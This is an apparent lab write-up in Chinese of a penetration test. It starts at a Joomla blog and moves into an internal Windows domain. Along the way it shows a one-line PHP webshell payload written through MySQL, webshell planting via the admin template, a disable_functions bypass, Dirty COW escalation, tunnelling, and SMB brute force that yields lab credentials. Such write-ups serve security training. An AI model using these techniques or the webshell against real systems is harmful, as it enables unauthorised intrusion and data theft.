信息搜集
打开网页发现是一个博客页面,使用 Wappalyzer 插件查看当前页面的信息
使用了名为 Joomla 的CMS,后端语言为PHP,使用 ping 命令发现 TTL 为 64 判断为 linux 系统
查看其端口:
发现CMS版本号
扫描目录
目录 | 作用 |
---|---|
1.php | phpinfo界面 |
/administrator | 后台登陆界面 |
/configuration.php~ | 配置文件 |
在配置文件中发现 mysqli 账号密码,使用 navicat 连接
尝试get shell
mysql写马
在当前用户下查询权限,发现可以在任意目录进行文件读写的操作
结合在 phpinfo 界面得到的绝对路径信息,尝试写入一句话木马
select "<?php eval($_POST['cmd']);?>" into outfile "/var/www/html/zzz.php"
产生1045报错,无法写入
登陆后台
发现后台的超级管理员登陆账号密码
修改密码为testadmin
尝试登陆
登陆后台后模板写入一句话
因为py到了后门,直接上车!
执行命令
发现命令无法执行
返回浏览 phpinfo 界面,发现许多函数被ban,于是需要使用蚁剑插件绕过 disable_functions
成功绕过
搜集主机信息
网卡信息
使用ifconfig
命令查看当前机器的网卡信息
发现存在地址为 192.168.93.120 的内网地址
敏感文件信息
在目录中浏览发现一串用户名和密码,adduser
是linux创建新用户的操作,尝试使用ssh连接
控制出网机、搭建隧道
SSH连接
发现密码被改了…
技术太拉爆破没成,原地上车 firefart:123456
搭建隧道
在tmp文件夹中上传隧道配置文件
提示文件权限不足,用户可以使用脏牛进行提权
参考文章 工具下载
提权后为文件赋予可执行权限
成功搭建隧道
内网信息搜集
内网存活主机探测
可以使用工具serverscan或者fscan
在出网机中上传fscan,并根据前面拿到的网卡信息进行扫描
使用命令./fscan -h 192.168.93.0/24
有5台存活主机
其中20 30 10
为windows主机
100 120
已被拿下
并获得所有主机的端口开放信息
内网网络拓补
主机IP | 主机系统 | 主机作用 | 开放端口 |
---|---|---|---|
192.168.93.100 | CentOS | 出网机 | 22、80、3306 |
192.168.93.120 | Ubuntu | web服务器 | 22、80、3306 |
192.168.93.10 | Windows Server 2012 R2 | 88、135、139、445 | |
192.168.93.20 | win2008 | 80、135、139、445、1433 | |
192.168.93.30 | win7 | 135、139、445 |
尝试拿下域内的20主机
配置proxychains
- 安装proxychains
sudo apt-get install proxychains
- 配置文件
sudo vim /etc/proxychains.conf
- 在最后一行改为 socks5 127.0.0.1:1234 即可
爆破SMB服务
使用proxychains msfconsole
挂载代理启动msf
配置爆破设置后启动
得到账号、密码为Administrator:123qwe!ASD
控制20主机
莫名其妙上了个3389的车,直接用远程桌面发现存在域控
发现主机10为域控